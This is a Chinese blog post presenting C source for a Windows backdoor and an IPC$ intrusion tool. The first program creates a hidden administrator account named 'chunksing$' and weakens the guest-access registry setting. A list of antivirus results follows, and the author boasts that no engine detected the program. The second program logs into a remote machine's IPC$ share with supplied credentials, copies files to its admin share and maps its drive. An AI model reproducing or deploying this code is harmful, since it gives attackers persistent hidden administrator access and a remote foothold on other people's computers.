C语言,后门程序,用C语言写的后门beta2.0 | IPC$入侵傻瓜式工具-CSDN博客

// 后门.cpp : Defines the entry point for the console

application.

#include "stdafx.h"

#include "stdlib.h"

int main(int argc, char* argv[])

{

system("reg add

\"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\" /v

forceguest /t REG_DWORD /d 0x0 /f");

//使用简单文件共享

system("net start

lanmanworkstation");//开启IPC服务

system("net user chunksing$ chunksing

/add"); //建立帐户

system("net localgroup administrators chunksing$

/add"); //ADMINISTRATOR

//system("net start schedule ");//start at

return 0;

}

//相当出色的成绩啊,没有一个杀软检测出来!

扫描结果

全部的杀毒软件报告没有发现病毒!

时间

2010/07/03

09:25:35 (CST)

a-squared

5.0.0.13

20100703011713

2010-07-03

5.473

AntiVir

8.2.4.2

7.10.8.247

2010-07-02

0.263

Arcavir

2009

201006281601

2010-06-28

0.004

Authentium

5.1.1

201007021335

2010-07-02

1.393

AVAST!

4.7.4

100702-1

2010-07-02

0.013

AVG

8.5.793

271.1.1/2978

2010-07-03

0.269

BitDefender

7.90123.6363560

7.32553

2010-07-03

3.897

ClamAV

0.96.1

11316

2010-07-03

0.099

Comodo

3.13.579

5294

2010-07-02

0.914

CP Secure

1.3.0.5

2010.07.03

2010-07-03

0.070

Dr.Web

5.0.2.3300

2010.07.03

2010-07-03

8.568

F-Prot

4.4.4.56

20100702

2010-07-02

1.403

F-Secure

7.02.73807

2010.07.02.05

2010-07-02

0.194

GData

21.450/21.164

20100702

2010-07-02

7.072

Ikarus

T3.1.01.84

2010.07.02.76184

2010-07-02

7.511

Microsoft

1.5902

2010.07.03

2010-07-03

6.950

Norman

6.05.10

6.05.00

2010-07-02

6.011

nProtect

20100702.01

8879235

2010-07-02

8.216

Quick Heal

10.00

2010.06.30

2010-06-30

1.785

Sophos

3.09.0

4.55

2010-07-03

3.445

Sunbelt

3.9.2426.2

6537

2010-07-02

10.726

The Hacker

6.5.2.1

v00307

2010-07-01

0.358

VBA32

3.12.12.5

20100702.0840

2010-07-02

3.176

ViRobot

20100702

2010.07.02

2010-07-02

0.380

VirusBuster

4.5.11.10

10.126.115/2044374

2010-07-03

2.591

卡巴斯基

5.5.10

2010.07.02

2010-07-02

0.136

安博士V3

2010.06.18.01

2010.06.18

2010-06-18

1.241

安天

2.0.18

20100703.4826967

2010-07-03

0.119

江民杀毒

13.0.900

2010.07.02

2010-07-02

1.239

熊猫卫士

9.05.01

2010.06.30

2010-06-30

0.607

瑞星

20.0

22.54.04.04

2010-07-02

1.367

赛门铁克

1.3.0.24

20100702.003

2010-07-02

0.069

趋势科技

9.120-1004

7.280.16

2010-07-02

0.044

迈克菲

5400.1158

6031

2010-07-02

17.227

金山毒霸

2009.2.5.15

2010.7.2.17

2010-07-02

0.620

飞塔

4.1.133

12.109

2010-07-02

0.196

■Heuristic/Suspicious ■Exact

注意:

没有发现病毒，但并不代表这不是一个新生的病毒，扫描结果将存储入数据库

这个入侵工具暂时还没有写完.~-------------------------------------------------------

// 新版本采用面向对象程序设计思想.

#include "stdafx.h"

#include "stdlib.h"

#include "iostream"

using namespace std;

class ipc

{

public:

void ReceiveIp ();

void functure ();

private:

int a, ip[4];

char local[5], remote[5], cmd[50], username[20],

password[20];

}a;

void ipc::ReceiveIp ()

{

int n;

printf("请输入四段IP地址，每段用回车结束\n"); //从键盘输入IP地址

for( n = 0; n < 4; n++ )

scanf("%d", &ip[n]);

printf("请输入用户名和密码 \n");

scanf("%s%s", username, password);

sprintf(cmd,"net use \\\\%d.%d.%d.%d\\ipc$

\"%s\" /user:\"%s\"", ip[0], ip[1], ip[2],

ip[3],password,username);

system(cmd); }

void ipc::functure ()

{

while(1)

{

printf("请输入数字\n");

printf("1.将C盘的1.TXT送到对方的C盘中\n2.登陆后映射对方C:到本地为z:

\n3.\n4.\n5.\n6.\n");

scanf("%d",

&a);

switch(a)

{

case 1 :

{ printf("请输入本地盘符\n");

scanf("%s",&local); printf("请输入远程盘符\n");

scanf("%s",&remote); sprintf(cmd,"copy %s:\\1.txt

\\\\%d.%d.%d.%d\\%s$", local, ip[0], ip[1], ip[2],

ip[3], remote);

system(cmd);

break;

}

case 2 :

{

printf("请输入本地盘符\n");

scanf("%s",&local); printf("请输入远程盘符\n");

scanf("%s",&remote);

sprintf(cmd,"net use %s: \\%d.%d.%d.%d\\\%s$", local, ip[0],

ip[1], ip[2], ip[3], remote);

system(cmd);break;

}

case 3 :

printf("暂时还没有功能\n");break;

case 4 :

printf("暂时还没有功能\n");break;

case 5 :

printf("暂时还没有功能\n");break;

case 6 :

printf("暂时还没有功能\n");break;

default :

printf("您输入的数字有问题\n");

}

//system("cls");

}

int main(int argc, char* argv[])

{

a.ReceiveIp ();

a.functure ();

return 0;

}